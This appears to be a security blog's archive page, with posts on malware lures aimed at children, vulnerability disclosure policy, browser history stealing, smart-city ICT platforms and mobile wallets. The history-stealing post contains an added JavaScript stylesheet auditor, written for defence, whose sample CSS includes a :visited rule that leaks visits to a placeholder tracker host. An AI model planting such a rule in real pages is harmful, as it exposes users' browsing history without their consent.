
Archive for the 'Calendar' category

The weakest link


Author: Carlos Plaza

The strength of a security system is determined by its weakest link, which is usually the user (some of the most popular hackers use social engineering as their primary tool to get access to business systems).

Within that weakest link we find an even more vulnerable group: kids.

In September, the security software manufacturer BitDefender carried out an information campaign on this issue (obviously with a commercial interest in promoting its products): nowadays children are growing up with the Internet but, being kids, they are less aware of how to avoid software vulnerabilities.

As a result, kids are bound to become a target for hackers looking to install malware, either through infected websites or by sending spam emails to children, hoping that their parents use the same software for their banking transactions (-:

The following are some examples of lures used to install malicious software:

- Kids look for drawings of their favorite cartoons to paint online, or to print and colour in; hackers use this trick to install malware.

- “Spot the difference” interactive games.

- Virtual pets: kids are asked to download an application to paint their pets, feed them, etc.

What would be the solution to this? Well, if educating grown-ups is a hard task, imagine kids… Technically, the recommendation is to use a good antimalware product or to create separate accounts for kids with some privileges taken away, so that an infection causes little damage.

Full disclosure vs responsible disclosure: the next chapter


Author: David Barroso

The eternal discussion of full disclosure vs responsible disclosure has a relatively new arena: critical infrastructure protection (CIP). From time to time, the best way of reporting a vulnerability to a manufacturer comes up for discussion. A procedure that satisfies both sides (the one who finds the vulnerability and the manufacturer) has not been institutionalized yet. There are all kinds of options, though none of them is more successful than the rest: acknowledging the researcher’s help (e.g. Microsoft), paying a certain amount of money (Google), or simply using a company that works as a broker and pays for vulnerabilities (e.g. iDefense VCP or TippingPoint ZDI). But the truth is that these methods don’t work; the best example happened last year, when a vulnerability in Windows was discovered by Tavis Ormandy. This case proves the need for some type of procedure that satisfies all sides.

Unfortunately, some manufacturers nowadays don’t think security is essential to avoid risk to their users (ZDI’s list of unpatched vulnerabilities is quite illustrative). On the other hand, some researchers think that manufacturers have to fulfill their requirements immediately, even to the point of extorting manufacturers. There have always been attempts to formalize vulnerability reporting, ranging from the well-known RFP's procedure and an IETF attempt, the Responsible Vulnerability Disclosure Process, which ended up becoming the basis of the Organization for Internet Safety procedure, to the No More Free Bugs initiative promoted by several researchers. In critical infrastructure protection we are now witnessing what happened elsewhere some years ago: after trying to do things right and realizing that it often doesn’t work, we come across positions like Digital Bond’s, whose vulnerability reporting policy is as simple as “we’ll do what we like”, because they have had enough of seeing how manufacturers, after incidents such as Stuxnet or the vulnerabilities found by Dillon Beresford, don’t seem to react, not even when ICS-CERT is involved (the manufacturer can even report you).

At the end of the day, what really matters is how much each manufacturer cares about handling and coordinating these incidents (communication with researchers and companies) because, if we have finally realized that none of the global vulnerability reporting policies works, it is the manufacturer’s task to set its own policy, ideally one that satisfies both sides. For instance, Mozilla, Barracuda, Google, Facebook or Twitter have already done it. Not all of them pay for the vulnerabilities found; some of them simply acknowledge the help.

In short, prevention is better than cure: all large firms must have a clear, published policy about the vulnerabilities that third parties find in their products, services or simply their websites, and they must also recognize the work of people who collaborate positively in enhancing network security.

I know where you have been….


Author: Carlos Plaza

On the Internet, many features that were designed for doing “good” are used for doing “evil” when it comes to security and privacy.

For example, the fact that an HTTP request includes information about screen size, browser version and language, available fonts, etc. was intended to allow websites to customize the layout or the localization of the content being served.

However, this information is also used to fingerprint devices in order to track users.

In the same way, the familiar feature of displaying visited and non-visited links in different colours has been used for “history stealing”: for example, a dubious website you visit includes a list of links and uses JavaScript to check the colour of each link to find out whether you have visited it.

This way, the site can learn “interesting things”, such as the banks you have visited, in order to target a phishing attack.

There are even companies that sell products or services for web developers to use for history stealing (BeenCounter), or for companies that want to know whether a visitor to their website has previously visited other sites with information about the company (Tealium).

This feature has been exploited to compromise user privacy in a sophisticated way, as researchers at Stanford University have recently published: an in-depth study of an online tracking company which checks whether the user has visited any of a list of more than 15,000 links, carefully segmented into categories such as group purchases, home appliances, cars, or even sensitive information such as health or financial issues…

And what protection is available to users?

Browsers such as Firefox have included in their recent versions a fix to protect against history stealing, although there is never a 100% guarantee that attackers will not be able to circumvent the protection (for example, by not using JavaScript but background images for visited links)… In fact, it took several years of discussion in the Mozilla community to choose a mechanism, since there was no clear option to eliminate the attack without affecting other functionality.

So it’s not a bad idea to use some free add-ons, such as Ghostery or other tools that prevent tracking and avoid the execution of scripts from blocked trackers, or NoScript to selectively block or allow scripts. And, of course, to configure your browser to delete the history when you close it.
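
One way to review a stylesheet for the history-stealing pattern described in this post, including the background-image variant, is to flag every `:visited` rule that sets something other than a colour. This is an added example, not code from the original post or from any browser; the allowlist (modelled on the colour-only styling browsers permit for `:visited`), the name `auditVisitedRules` and the `tracker.example` host are assumptions made for illustration.

```javascript
// Added example: flag :visited rules that set more than colours.
// Assumption: allowlist modelled on the colour-only styling that browsers
// permit for :visited; adjust it to the browsers you support.
const COLOR_ONLY = new Set([
  'color', 'background-color', 'outline-color', 'column-rule-color',
  'border-color', 'border-top-color', 'border-right-color',
  'border-bottom-color', 'border-left-color', 'fill', 'stroke',
]);

// Constructed sample stylesheet; tracker.example is a placeholder host.
const SAMPLE_CSS = `
/* a.old:visited { display: none } (commented out, must be ignored) */
a:link, a:visited { color: #036; }
a#bank:visited { background-image: url(https://tracker.example/hit?id=bank;v=1); }
@media screen { a.probe:visited { display: none; border-color: red } }
`;

// "property: value" pairs; a semicolon inside (...) or quotes does not
// end the value, so url(...) arguments survive intact.
const DECL = /([\w-]+)\s*:\s*((?:[^;("']|\([^)]*\)|"[^"]*"|'[^']*')+)/g;

function auditVisitedRules(cssText) {
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ''); // drop comments
  const findings = [];
  // Match innermost "selectors { declarations }" blocks, which also
  // covers rules nested inside @media.
  for (const [, selectorList, body] of css.matchAll(/([^{}]+)\{([^{}]*)\}/g)) {
    const visited = selectorList.split(',').map((s) => s.trim())
      .filter((s) => /:visited\b/i.test(s));
    if (visited.length === 0) continue;
    for (const [, rawProp, rawValue] of body.matchAll(DECL)) {
      const property = rawProp.toLowerCase();
      if (COLOR_ONLY.has(property)) continue; // colour change only
      const value = rawValue.trim();
      findings.push({
        selector: visited.join(', '),
        property,
        value,
        // url(...) makes the browser fetch a resource, so the server sees
        // the visit; anything else changes layout a script can measure.
        channel: /url\(/i.test(value) ? 'network' : 'layout',
      });
    }
  }
  return findings;
}

console.log(auditVisitedRules(SAMPLE_CSS));
```

A finding with `channel: 'network'` corresponds to the no-JavaScript variant mentioned above; a `'layout'` finding only leaks if a script on the page can read the resulting geometry.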

Smart cities, the first challenge for the Future Internet


Author: Jose Manuel Hernández

From the information and communication technologies (ICT) point of view, and at a holistic level, cities can be considered as ‘systems of systems’. However, one of the best-known definitions of a Smart City was already provided some years ago by the EU project ‘European Smart Cities’ [1]. In that work, six dimensions of ‘smartness’ were identified, each of them somehow related to the ICT world (economy, people, governance, mobility, environment, and living).

As ICT has surged to become the nervous system of all modern economies, making cities smarter is usually achieved through the use of ICT-intensive solutions. In fact, ICT is already at the heart of many current models for urban development: revamping critical infrastructure and enabling new ways of managing city transport, controlling traffic or monitoring environmental pollution. The extensive use of ICT is also empowering the development of essential services for health, security, police and fire departments, governance and the delivery of public services. Nevertheless, the main concern with most of these solutions is that their own commercial approach is leading to an unmanageable and unsustainable sea of systems and market islands. From the point of view of the Telcos, which is quite well aligned with the European Commission's approach to the PPP, there is a need to reach a high-level agreement across the industry to overcome this increasing market fragmentation, which prevents solutions from becoming more efficient, scalable and suitable for supporting new generations of services that are not even envisaged nowadays.

Consequently, the successful development of the Smart Cities paradigm will “require a unified ICT infrastructure to allow a sustainable economic growth” [2], and this unified ICT platform must be suitable to “model, measure, optimize, control, and monitor complex interdependent systems of dense urban life” [3]. Therefore in the design of urban-scale ICT platforms, three main core functionalities can be identified:

•  Urban Communications Abstraction. One of the most urgent demands for sustainable urban ICT developments is to solve the inefficient use (i.e. duplication) of existing or new communication infrastructures. Due to the broad set of heterogeneous urban scenarios, there will also be a pronounced heterogeneity of the underlying communication layers. Through communications abstraction, urban-scale ICT platforms will allow unified communications regardless of the different network standards and will enable data transfer services that are agnostic to the underlying connection protocol. Furthermore, a major challenge in future urban spaces will be how to manage the increasing number of heterogeneous and geographically dispersed machines, sensors and actuators intensively deployed everywhere in the city.

•  Unified Urban Information Models. Also related to the huge amount of heterogeneous information generated at urban scale, a unified ICT platform should be built on top of a unified model so that data and information can be shared among different applications and services at global urban levels. This will rely on the articulation of different enriched semantic descriptions, enabling the development of information processing services involving different urban resources and entities of interest. Specific information management policies should also be addressed to ensure the required level of security and privacy of information.

•  Open Urban Services Development. Together with unified communications and information, a key functionality of urban ICT platforms should be to guarantee interoperability at both the application and service levels. Only through open, easy-to-use and flexible interfaces will the different agents involved (public administrations, enterprises, and citizens) be able to conceive new innovative solutions to interact with and manage all aspects of urban life in a cost-effective way. This will provide the necessary innovation-enabling capabilities for attracting public and private investments to create products and services which have not yet been envisioned, a crucial aspect for Smart Cities to become future engines of a productive and profitable economy.

Once the major challenges of unified urban-scale ICT platforms are identified, it is clear that the future development of Smart Cities will only be achievable in conjunction with a technological leap in the underlying ICT infrastructure. This technological leap can be faced by considering Smart Cities at the forefront of the recent vision of the Future Internet (FI). Although there is no universally accepted definition of the Future Internet, it can be approached as “a socio-technical system comprising Internet-accessible information and services, coupled to the physical environment and human behavior, and supporting smart applications of societal importance” [4]. Thus the FI can transform a Smart City into an open innovation platform supporting vertical domains of business applications built upon horizontal enabling technologies. The most relevant basic FI pillars [8] for a Smart City environment are the following:

•  The Internet of Things (IoT): defined as a global network infrastructure based on standard and interoperable communication protocols where physical and virtual “things” are seamlessly integrated into the information network [5].

•  The Internet of Services (IoS): flexible, open and standardized enablers that facilitate the harmonization of various applications into interoperable services as well as the use of semantics for the understanding, combination and processing of data and information from different service providers, sources and formats.

•  The Internet of People (IoP): envisaged as people becoming part of ubiquitous intelligent networks having the potential to seamlessly connect, interact and exchange information about themselves and their social context and environment.

At this point, it is important to highlight a bidirectional relationship between the FI and Smart Cities: in one direction, the FI can offer solutions to many challenges that Smart Cities face; in the other direction, Smart Cities can provide an excellent experimental environment for the development, experimentation and testing of common FI service enablers required to achieve ‘smartness’ in a variety of application domains [6]. To this latter extent, close to the IoP vision, the Living Labs network [7], based on the user-driven approach, is of main relevance.

1. Smart Cities, Ranking of European medium-sized cities, http://www.smart-cities.eu/
2. The ICT behind cities of the future, http://www.nokiasiemensnetworks.com/news-events/publications/unite-magazine-february-2010/the-ictbehind-cities-of-the-future
3. Simonov, M.: Future Internet applications relevant for smart cities, an ICT application area example: smart & proactive energy management, Open Innovation by FI-enabled services, Brussels, 15 January (2010)
4. Position Paper: Research Challenges for the Core Platform for the Future Internet. In: M. Boniface, M. Surridge, C.U (Eds.) http://ec.europa.eu/information_society/activities/foi/library/docs/fippp-research-challenges-for-coreplatform-issue-1-1.pdf
5. Sundmaeker, H., Guillemin, P., Friess, P., Woelfflé, S. (eds.): Vision and Challenges for Realising the Internet of Things, CERP-IoT, March 2010. European Commission, Brussels (2010)
6. Future Internet Assembly 2009, Stockholm, Sweden (November 2009), http://ec.europa.eu/information_society/activities/foi/library/docs/fi-stockholm-report-v2.pdf
7. The European Network of Living Labs, http://www.openlivinglabs.eu/
8. Towards a Future Internet Public Private Partnership, Usage Areas Workshop, Brussels, 3 March (2010), http://ec.europa.eu/information_society/activities/foi/events/fippp3/fi-ppp-workshop-report-final.pdf

Who needs a mobile wallet?


Before answering this question it is important to know what we mean when we talk about a “mobile wallet” (mWallet). To do this, just imagine the fusion of our wallet with our mobile phone, so that it would virtually contain electronic money (eMoney), credit cards, point cards, transportation vouchers, discount coupons, etc.

If we analyze the characteristics of the services and pilots that have emerged in different parts of the planet over the past few years, we can clearly distinguish two types of mobile wallet: purse and credit card holder.

The electronic wallet makes it possible to have a means of payment collection associated with the mobile phone number. These services have expanded successfully in certain countries with emerging economies such as the Philippines (G-Cash and SmartMoney), South Africa (MTN Mobile Money and Wizzit), Kenya (the successful M-PESA) or Paraguay (Tigo Cash, which has already spread to other Latin American countries).

The above examples share several characteristics, the most important being that they cover the same set of requirements for a large segment of the population that has no access to traditional banking products. Among these needs we can highlight money transfers, both national (for example, transferring money to a child who has moved away to study) and international (transfers made by emigrants to their homes), the payment of electricity or water bills, the payment of wages, and even the receipt of social funds sent by the Government. In regions with a low penetration of bank offices, each of these operations used to require long journeys, some even lasting days, and those are costs that many people cannot afford. Thanks to electronic wallet services, these money transfers can be performed quickly, easily and economically, without having to travel beyond the corner store and at sufficiently low operation prices.

However, in “banked” regions, where the vast majority of the population is used to having bank accounts or credit cards, other needs arise, such as having a suitable payment method for small purchases (for example, to pay a parking meter or for a drink from a vending machine), making payments in shops in a more secure and flexible way (for example, against one of our credit cards, our bank account or even our telephone bill), or automatically using our point cards and discount vouchers (accumulating points and applying discounts).

In these cases the aim is to use the mobile phone as an electronic credit card holder that is easy to use and as secure as, or more secure than, current means of payment. Thus the SIM in the phone (a safe and secure environment in which sensitive data such as a credit card can be stored) and NFC wireless communication technology are the main players in most of the pilots being deployed in Europe. In particular, Telefónica, along with La Caixa and VISA, has run an NFC payments pilot in Sitges for 6 months, in which more than 1500 Movistar customers took part, making payments with Samsung S5230 mobile phones in more than 500 shops.

The same solution, the use of the mobile phone as an electronic wallet, covers needs which are very different. In view of the large number of services and pilots that are being deployed with varying degrees of success, the answer to our initial question seems clear: the “mobile wallet” is necessary both in emerging economies, with the aim “to bank people who are not”, and in the most developed economies, using new wireless communication technologies to create a new experience of payment via mobile phone.